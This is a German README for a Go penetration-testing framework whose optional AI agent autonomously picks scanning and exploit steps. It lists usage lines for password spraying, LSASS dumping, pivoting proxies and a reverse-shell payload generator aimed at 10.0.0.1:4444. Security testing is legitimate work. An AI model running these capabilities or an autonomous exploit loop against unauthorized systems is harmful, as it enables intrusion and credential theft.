
Penetrationstest-Framework mit KI-gesteuerter Entscheidungs-Engine
In Go geschriebenes, Windows-natives Penetrationstest-Framework. Modulare Architektur mit KI-gesteuerter Entscheidungs-Engine (OpenAI-kompatible API).
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/
Cross-Kompilierung:
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"
Kopiere .env.example nach .env:
Ohne KI-Konfiguration läuft das Tool im manuellen CLI-Modus (alle Optionen funktionieren normal).
Wenn OPENAI_API_KEY gesetzt ist, führt das Tool eine ReAct-Schleife aus: Der KI-Agent entscheidet anhand der bisherigen Ergebnisse, welche Tools aufgerufen werden. Das System-Prompt definiert einen Pentest-Workflow: Recon -> Fingerprinting -> Schwachstellenscan -> Exploit -> Report.
Ohne KI ist die gesamte Funktionalität über CLI-Optionen verfügbar.
| Flag | Beschreibung |
|---|
-t | Ziel-Domain/IP/URL |
-p | Ports (Komma oder Bereich, Standard: 80,443,22,21,3389,3306,6379,27017) |
-subdomain | Subdomain-Enumeration |
-portscan | TCP-Portscan |
-fingerprint | Service-Fingerprinting |
-dirbuster | Directory-Brute-Force |
-vulnscan | POC-basierter Schwachstellenscan |
-logic | Prüfung auf Logikschwachstellen |
-spray | Password-Spraying |
-exploit | Exploit-Module |
-report | HTML- und JSON-Report erzeugen |
-o | Ausgabedatei (Standard: report.html) |
-socks | SOCKS5-Proxy auf Port starten |
-httpproxy | HTTP-Proxy auf Port starten |
-forward | Portweiterleitung (lokal:Host:Remote) |
-payload | Payload erzeugen (revshell|IP|PORT) |
-v | Ausführlich |
-debug | Debug-Ausgabe |
-workers | Parallele Worker (Standard: 20) |
-timeout | Timeout in Sekunden (Standard: 30) |
-proxy | Proxy-URL |
-audit | Audit-Log-Pfad (Standard: audit.json) |
| Variable | Beschreibung |
|---|
OPENAI_BASE_URL | OpenAI-kompatible API-Basis-URL |
OPENAI_API_KEY | API-Schlüssel |
OPENAI_MODEL_NAME | Modell (Standard: gpt-4) |
PROXY | Proxy-URL |
MAX_WORKERS | Maximale Worker (Standard: 20) |
REQUEST_TIMEOUT | Timeout in Sekunden (Standard: 30) |
RETRY_COUNT | Wiederholungsversuche (Standard: 3) |
| Paket | Beschreibung |
|---|
cmd/fucker/ | Einstiegspunkt, CLI-Parsing, Modul-Orchestrierung |
internal/ai/ | OpenAI-Client, ReAct-Agenten-Schleife, Tool-System |
internal/scanner/ | Portscan, Subdomain, Fingerprinting, Dirbuster |
internal/vuln/ | YAML-POC-Engine, 16 integrierte POCs, Logikprüfungen |
internal/exploit/ | Reverse-Shell-Generator, SOCKS5/HTTP-Proxy, Memshell |
internal/lateral/ | Password-Spraying, LSASS-Minidump, SMB/RDP-Proxy |
internal/report/ | HTML-Template-Report, JSON-Export, Risikobewertung |
internal/logger/ | Abgestuftes Logging, audit.json-Verlauf |
internal/plugin/ | Python/Go-Plugin-Loader |
internal/config/ | .env-Loader |
internal/common/ | Gemeinsame Typen |